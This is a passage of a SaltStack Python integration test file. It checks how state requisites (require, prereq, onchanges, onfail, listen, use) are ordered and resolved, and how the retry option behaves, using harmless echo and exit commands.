'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
Teste the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 resolution theses tests would maybe become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls',
mods='requisites.onfail_multiple',
timeout=self.TIMEOUT)
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.listen_names',
timeout=self.TIMEOUT)
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immedietly (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
@flaky
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attmempt
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
